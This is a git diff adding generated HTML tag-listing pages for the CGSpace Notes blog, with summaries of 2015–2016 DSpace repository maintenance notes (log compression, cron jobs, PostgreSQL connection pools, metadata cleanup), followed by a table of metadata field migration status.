+<li>Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit</li>
+<li>We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc</li>
+<li>After running DSpace for over five years I&rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!</li>
+<li>This will save us a few gigs of backup space we&rsquo;re paying for on S3</li>
+<li>Also, I noticed the <code>checker</code> log has some errors we should pay attention to:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-03/">March, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-03-02T16:50:00+03:00">Wed Mar 02, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-03-02">2016-03-02</h2>
+<ul>
+<li>Looking at issues with author authorities on CGSpace</li>
+<li>For some reason we still have the <code>index-lucene-update</code> cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module</li>
+<li>Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-02/">February, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-02-05T13:18:00+03:00">Fri Feb 05, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-02-05">2016-02-05</h2>
+<ul>
+<li>Looking at some DAGRIS data for Abenet Yabowork</li>
+<li>Lots of issues with spaces, newlines, etc causing the import to fail</li>
+<li>I noticed we have a very <em>interesting</em> list of countries on CGSpace:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/02/cgspace-countries.png" alt="CGSpace country list"></p>
+<ul>
+<li>Not only are there 49,000 countries, we have some blanks (25)&hellip;</li>
+<li>Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/tags/notes/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/tags/notes/page/3/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/tags/notes/page/3/index.html b/docs/tags/notes/page/3/index.html
new file mode 100644
index 000000000..87f1eb4bc
--- /dev/null
+++ b/docs/tags/notes/page/3/index.html
@@ -0,0 +1,234 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/tags/notes/" />
+<meta property="og:updated_time" content="2020-11-30T12:10:20+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/tags/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/tags/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-01/">January, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-01-13T13:18:00+03:00">Wed Jan 13, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-01-13">2016-01-13</h2>
+<ul>
+<li>Move ILRI collection <code>10568/12503</code> from <code>10568/27869</code> to <code>10568/27629</code> using the <a href="https://gist.github.com/alanorth/392c4660e8b022d99dfa">move_collections.sh</a> script I wrote last year.</li>
+<li>I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.</li>
+<li>Update GitHub wiki for documentation of <a href="https://github.com/ilri/DSpace/wiki/Maintenance-Tasks">maintenance tasks</a>.</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2015-12/">December, 2015</a></h2>
+    <p class="blog-post-meta"><time datetime="2015-12-02T13:18:00+03:00">Wed Dec 02, 2015</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2015-12-02">2015-12-02</h2>
+<ul>
+<li>Replace <code>lzop</code> with <code>xz</code> in log compression cron jobs on DSpace Test—it uses less space:</li>
+</ul>
+<pre tabindex="0"><code># cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2015-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2015-11/">November, 2015</a></h2>
+    <p class="blog-post-meta"><time datetime="2015-11-23T17:00:57+03:00">Mon Nov 23, 2015</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2015-11-22">2015-11-22</h2>
+<ul>
+<li>CGSpace went down</li>
+<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
+<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
+78
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2015-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/tags/notes/page/2/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary disabled" href="#" role="button" aria-disabled="true">Next page</a>
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/tags/page/1/index.html b/docs/tags/page/1/index.html
new file mode 100644
index 000000000..435aa6c39
--- /dev/null
+++ b/docs/tags/page/1/index.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en-us">
+  <head>
+    <title>https://alanorth.github.io/cgspace-notes/tags/</title>
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/tags/">
+    <meta name="robots" content="noindex">
+    <meta charset="utf-8">
+    <meta http-equiv="refresh" content="0; url=https://alanorth.github.io/cgspace-notes/tags/">
+  </head>
+</html>

Field Name	migrate-fields.sh	Input Forms	XMLUI Themes¹	dspace.cfg	Discovery	Atmire Modules
cg.creator.identifier	✓	✓	✓	-	✓	✓
dcterms.extent	✓	✓	-	-	-	-
dcterms.issued	✓	✓	?	✓	✓	✓
dcterms.abstract	✓	✓	✓	✓	✓	-
dcterms.description	✓	✓	✓	✓	✓	✓
cg.contributor.donor	✓	✓	✓	✓	✓	✓
cg.reviewStatus	✓	✓	✓	-	✓	-
cg.howPublished	✓	✓	-	-	-	-
dcterms.bibliographicCitation	✓	✓	✓	-	-	✓
dcterms.accessRights	✓	✓	✓	-	✓	✓
dcterms.language	✓	✓	✓	-	✓	✓
dcterms.relation	✓	✓	✓	-	-	-
dcterms.publisher	✓	✓	-	-	✓	✓
dcterms.isPartOf	✓	✓	-	✓	✓	✓
dcterms.license	✓	✓	✓	✓	✓	✓
cg.journal	✓	✓	-	-	✓	✓
dcterms.subject	✓	✓	✓	✓	✓	✓
dcterms.type	✓	✓	✓	✓	✓	✓
cg.isbn	✓	✓	-	-	-	✓
cg.issn	✓	✓	-	-	-	✓
dcterms.audience	✓	✓	-	-	-	✓